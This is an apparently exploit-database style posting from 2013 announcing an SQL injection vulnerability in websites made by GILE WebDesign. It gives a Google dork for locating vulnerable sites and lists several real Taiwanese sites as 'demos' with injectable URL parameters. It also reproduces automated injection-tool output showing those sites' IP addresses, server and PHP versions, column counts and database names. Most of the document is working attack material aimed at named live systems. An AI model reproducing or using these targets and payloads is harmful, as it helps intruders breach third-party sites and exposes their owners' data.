facebook facebook twitter rss

GILE WebDesign SQL Injection Vulnerability

Author: TUNISIAN CYBER , Published: 02-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: GILE WebDesign SQL Injection Vulnerability
[+] Date: 2-12-2013
[+] Category: WebApp
[+] Google Dork: intext:"Design by GILE" inurl:php
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################


Demos:
http://www.lufada.com.tw/product_list.php?CateId=1'
http://www.yafood.com.tw/prodcate.php?CateId=3'
http://www.phr.com.tw/bullhorn_detail.php?ActivityId=6
http://www.tgksound.com.tw/news_detail.php?NId=16'
http://www.tgksound.com.tw/news_detail.php?NId=16'
http://www.gile.com.tw/work_list.php?Cate=2'

Host IP: 203.69.42.184
Web Server: Apache
Powered-by: PHP/5.2.11
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 1
Valid String Column is 1
Current DB: DBL01767


Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 3
Valid String Column is 2
Current DB: DBL01643

Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: ã€Œå °å°¼æ–‡åŒ–ç¯€-æ˜Ÿå…‰é–ƒè€€ã€Žå °ã€ æ–°å¹´ã€ æ´»å‹•
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 20
Current DB: phr

Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 17
Valid String Column is 2
Current DB: sound98k

Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 2
Current DB: gile

########################################################################################

########################################################################################

Like us on Facebook :